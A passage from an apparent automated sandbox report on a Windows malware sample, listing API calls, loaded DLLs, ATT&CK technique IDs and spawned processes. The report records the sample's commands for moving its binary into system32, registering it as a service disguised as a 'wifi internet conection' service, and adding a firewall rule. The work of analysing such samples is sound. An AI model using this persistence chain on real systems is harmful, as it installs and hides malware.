\"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005976)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006044)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006044)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006044)\n \"cmd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006044)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00006096)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00006096)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006096)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006096)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006096)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006096)\n \"sc.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00003764)\n \"sc.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00003764)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003764)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003764)\n \"sc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003764)\n \"sc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003764)\n \"jaigqlsg.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"LoadLibrary\" with a parameter dbghelp.dll (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"LoadLibrary\" with a parameter KERNEL32.dll (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"LoadLibrary\" with a parameter msvcr100.dll (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004216)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter Dhcpqec.dll (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WSHELPER.DLL (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHHTTP.DLL (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter FWCFG.DLL (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter AUTHFWCFG.DLL (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter IFMON.DLL (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETIOHLP.DLL (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WHHELPER.DLL (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HNETMON.DLL (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter RPCNSH.DLL (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter DOT3CFG.DLL (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NAPMONTR.DLL (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NSHIPSEC.DLL (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter NETTRACE.DLL (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WCNNETSH.DLL (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter P2PNETSH.DLL (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WLANCFG.DLL (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter WWANCFG.DLL (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter PEERDISTSH.DLL (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L1-1-0.dll (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-Management-L2-1-0.dll (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-Service-winsvc-L1-1-0.dll (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter HTTPAPI.dll (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter userenv.dll (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\bcryptprimitives.dll (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004188)\n \"netsh.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00004188)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003600)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003600)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003600)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003600)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00003600)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter Iphlpapi.dll (UID: 00000000-00003600)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00003600)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00003600)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00003600)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00003600)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 74F00000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 74AC0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00003600)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75C40000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75C40000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75C40000\n \"jaigqlsg.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75C40000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75C40000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75C40000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"jaigqlsg.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"jaigqlsg.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"jaigqlsg.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"jaigqlsg.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\pltdkegk\\\\\" (UID: 00000000-00005968)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\jaigqlsg.exe\" %WINDIR%\\\\system32\\\\pltdkegk\\\\\" (UID: 00000000-00006044)\n Spawned process \"sc.exe\" with commandline \"create pltdkegk binPath= \"%WINDIR%\\\\system32\\\\pltdkegk\\\\jaigqlsg ...\" (UID: 00000000-00006096), Spawned process \"sc.exe\" with commandline \"description pltdkegk \"wifi internet conection\"\" (UID: 00000000-00003764), Spawned process \"sc.exe\" with commandline \"start pltdkegk\" (UID: 00000000-00006032), Spawned process \"jaigqlsg.exe\" with commandline \"/d\"C:\\\\2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd2 ...\" (UID: 00000000-00004216)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00004188), Spawned process \"svchost.exe\" (UID: 00000000-00003600)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\pltdkegk\\\\\" (UID: 00000000-00005968)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\jaigqlsg.exe\" %WINDIR%\\\\system32\\\\pltdkegk\\\\\" (UID: 00000000-00006044)\n Spawned process \"sc.exe\" with commandline \"create pltdkegk binPath= \"%WINDIR%\\\\system32\\\\pltdkegk\\\\jaigqlsg ...\" (UID: 00000000-00006096), Spawned process \"sc.exe\" with commandline \"description pltdkegk \"wifi internet conection\"\" (UID: 00000000-00003764), Spawned process \"sc.exe\" with commandline \"start pltdkegk\" (UID: 00000000-00006032), Spawned process \"jaigqlsg.exe\" with commandline \"/d\"C:\\\\2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd2 ...\" (UID: 00000000-00004216)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00004188), Spawned process \"svchost.exe\" (UID: 00000000-00003600)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"cmd.exe\" (UID: 00000000-00005968) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"cmd.exe\" (UID: 00000000-00005968) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"\n Process \"jaigqlsg.exe\" (UID: 00000000-00004216) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"jaigqlsg.exe\" (UID: 00000000-00004216) was launched with missing environment variables: \"LOGONSERVER, USERDNSDOMAIN, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00004188) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", USERDNSDOMAIN=\"%OSUSER%-PC\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00004188) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"svchost.exe\" (UID: 00000000-00003600) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, USERDNSDOMAIN, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00003600) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"jaigqlsg.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"jaigqlsg.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"jaigqlsg.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetProcAddress\" 